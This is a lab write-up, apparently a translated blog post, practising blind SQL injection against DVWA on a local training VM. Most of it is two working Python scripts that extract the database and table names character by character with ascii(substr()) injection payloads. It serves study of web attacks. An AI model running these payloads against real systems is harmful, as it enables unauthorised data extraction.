purpose
Understanding SQL blinds principles, methods, processes. Using different database-specific detection function, thereby acquiring information.
surroundings
System: Kali Linux 2019 (IP: 10.10.10.128 )
Platform: OWASPBWA v0.94 in DVWA (IP: 10.10.10.131)
interface
operating
Substr function now want to use the database name to guess the character into ACSII value bit-wise comparison.
Syntax
substr (strings, offset, length)
- strings: Required, database fields taken
- offset: Required, starting position of the strings
- length: Required To intercept length
Python code
Exploration database name
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getDBName():
DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),{0},1))={1} %23&Submit=Submit"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve database name...")
for i in range(1,5):
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
DBName += char
break
print("Retrieve complated\nDBName is: " + DBName)
getDBName()
Import url request regular expressions and related modules, due to the premise of the need to inject landing, it is necessary to set up a URL headers, response should also be a session (session ()), most of the time to start looking on the Internet is requests.get (url ), so their operation or according to their actual needs to do the appropriate changes. Especially when the URL can not be set up to ensure that the lack of relevant field, when I began to forget the "& Submit = Submit" field, has led to no results.
Probe table
import requests
import re
header={
"Host":"10.10.10.131",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
"Connection":"close",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
def getTableName():
#DBName = ""
url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))={2} %23&Submit=Submit#"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve table name...")
print("-------------------------------")
for i in range(0,2): # number of tables
TableName = ""
for j in range(1,10): # length of table_name
for char in chars:
char_ascii=ord(char)
url = url_template.format(i,j,char_ascii)
response = requests.session().get(url,headers=header)
pattern = re.compile(r'Surname:')
match = pattern.search(response.text)
if match:
TableName += char
break
if len(TableName) == 0:
print("Can' Find")
else:
print(TableName)
print("-------------------------------")
print("Finish retrieving!")
getTableName()
to sum up
The whole process is relatively simple, but the practice is not so smooth, always need more practice.
Do notes, self-motivation!
Reference
https://blog.csdn.net/sophia9301/article/details/78215264
https://blog.csdn.net/MAILLIBIN/article/details/84592940